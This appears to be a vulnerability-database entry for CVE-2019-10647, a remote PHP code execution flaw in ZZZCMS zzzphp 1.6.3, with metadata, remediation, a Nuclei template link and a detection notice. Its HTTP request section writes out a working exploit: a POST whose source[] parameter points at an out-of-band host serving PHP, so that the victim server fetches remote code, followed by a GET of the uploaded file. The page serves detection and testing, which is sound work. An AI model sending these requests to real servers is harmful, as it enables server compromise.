🔙 목록으로 돌아가기

CVE-2019-10647: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)

TitleZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
AuthorSourabh-Sahu
SeverityCritical
ImpactAttackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
RemediationUpdate to the latest version of ZZZCMS or apply security patches that restrict PHP file handling in inc/zzz_file.php.
CVSS Score9.8
EPSS Score0.61932
CVE IDCVE-2019-10647
CWE IDCWE-434
Tags cve cve2019 rce zzzphp intrusive file-upload vuln zzzcms oast oob vkev

🔍 Vulnerability Description

ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter, exploit requires attacker to send malicious URL and server to serve PHP code as plain text.

🌐 HTTP Request

POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
Connection: close
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

source[]=http://d5jq5t1le0o4js4iv3n09dnkyiypgakfn.oast.site/38FeAmpdxqhuGohpIigJL1mAXi9.php
GET /upload/yv2Zv1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2019-10647.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-10647.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A